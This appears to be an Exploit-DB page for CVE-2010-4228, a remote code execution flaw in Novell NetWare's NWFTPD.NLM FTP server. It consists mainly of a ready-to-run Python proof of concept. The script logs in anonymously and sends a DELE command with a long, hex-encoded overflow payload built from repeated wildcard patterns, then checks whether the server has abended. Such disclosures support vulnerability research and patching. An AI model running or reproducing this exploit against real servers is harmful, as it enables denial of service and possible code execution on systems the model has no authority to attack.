Novell Netware NWFTPD.NLM DELE Remote Code Execution Vulnerability



EDB-ID: 17020 CVE: 2010-4228 OSVDB-ID: N/A
Author: Francis Provencher Published: 2011-03-21 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
#!/usr/bin/python
 
import socket, sys

# Source:
# http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=25&Itemid=25
 
host = (sys.argv[1])
data = "\x44\x45\x4c\x45\x20\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43\x43\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x45\x45\x45\x45\x45\x45\x46\x46\x46\x46\x47\x47\x47\x47\x48\x48\x44\x43\x42\x41\x0d\x0a"


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	s.connect((host, 21))
	d=s.recv(1024)
	print (d)
	s.send("USER toto\r\n") #anonymous login so anything goes
	d=s.recv(1024)
	print (d)
	s.send("PASS toto\r\n")
	d=s.recv(1024)
	print (d)
	s.send(data)
	d=s.recv(1024)
	print (d)
	s.close()
	
	try:
		s.connect((host,21))
	except:
		print ("\r\n[i] Beep Beep, take a look to your Abend log file.")
except:
	print ("[i] Error")